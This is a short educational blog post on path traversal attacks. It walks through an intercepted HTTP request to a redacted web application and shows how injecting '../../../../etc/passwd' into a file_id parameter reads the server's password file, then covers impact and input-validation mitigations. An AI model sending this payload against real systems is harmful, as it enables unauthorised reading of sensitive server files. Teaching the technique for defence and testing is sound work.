Greeting Everyone! Hope Everything Is Going Good!
Today in this Blog We Will Explore one of the most critical Security issue On Web Application We will Discuss what is path Traversal Attack? How It work? And now attack scenario work.
Content:
- What is Path Traversal Attack?
- Example Attack?
- Impact?
- Mitigation?
- Conclusion?
What is Path Traversal Attack?
Path Traversal is web based attack which allows an bad actor to read arbitrary files on the server running an application. This Vulnerability Cause to See Internal Directory Structure and an attacker can manipulate internal path of Vulnerable Web Application.
An bad actor can able to tamper the arbitrary file on the server, which give full control over the server running the application by path traversal . An attacker can manipulate data such as application code, data, credentials for Backend , Sensitive OS Files etc.
Example Attack Scenario
Now I have a web application which has functionality that we can Upload some file ,
As above picture we see Here We can Upload some file Now upload any file ,
After Upload we have Option “Get File” as now we can Get Our Uploaded File using POST. And before I started Burp for Checking field Value .
Now Request
· POST /get_dataset.php HTTP/1.1
· Host: redected.com
· User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
· Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
· Accept-Language: en-US,en;q=0.5
· Accept-Encoding: gzip, deflate
· Content-Type: application/x-www-form-urlencoded
· Content-Length: 20
· Connection: close
Cookie
utag_main=v_id:0177d87e1aa900900c23e1873ba0000440024009009fe$_sn:24$_se:1$_ss:1$_st:1616226082022$dc_visit:24$ses_id:1616224282022%3Bexp-session$_pn:1%3Bexp-session$dc_event:1%3Bexp-session$dc_region:ap-southeast-2%3Bexp-session; _ga=GA1.2.117635467.1614244882;
- · Upgrade-Insecure-Requests: 1
- · file_id=in65r8ebf9za
As above We see file_id= parameter which Manipulating data from Server.
Now As above we see Request And Response Section Now Here We have field file_id= which fetch data from back end server , here Inject it by adding ../../../../etc/passwd,
As above Picture we see we successfully able to manipulate etc/passwd file Due To path traversal . This is how Path Traversal Work.
Note: Before Attack make sure Your target is Running under Linux or Windows.
Some Of Payload Linux And Windows Based: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Directory%20Traversal/README.md
Impact Of Path Traversal Attack?
Able to Read Internal data.
Possibility for Command Injection.
Attacker may be able to create or overwrite critical files that are used to execute code, such as programs or libraries.
Mitigation Against Risk?
- The application should validate the user input before processing it. Ideally, the validation should compare against a whitelist of permitted values. If that isn’t possible for the required functionality, then the validation should verify that the input contains only permitted content, such as purely alphanumeric characters.
- After validating the supplied input, the application should append the input to the base directory and use a platform filesystem API to canonicalize the path. It should verify that the canonicalized path starts with the expected base directory.
Conclusion: In Today’s Blog we Discussed How To Perform Path Traversal , How it work As we explored How To perform Successful Attack against Targeted Website & Its Remediation Or Impact .
Thanks For Reading……. See You In Another Blog!
Stick With Our Blog: Click Here
Author
Pallab Jyoti Borah
VAPT Analyst
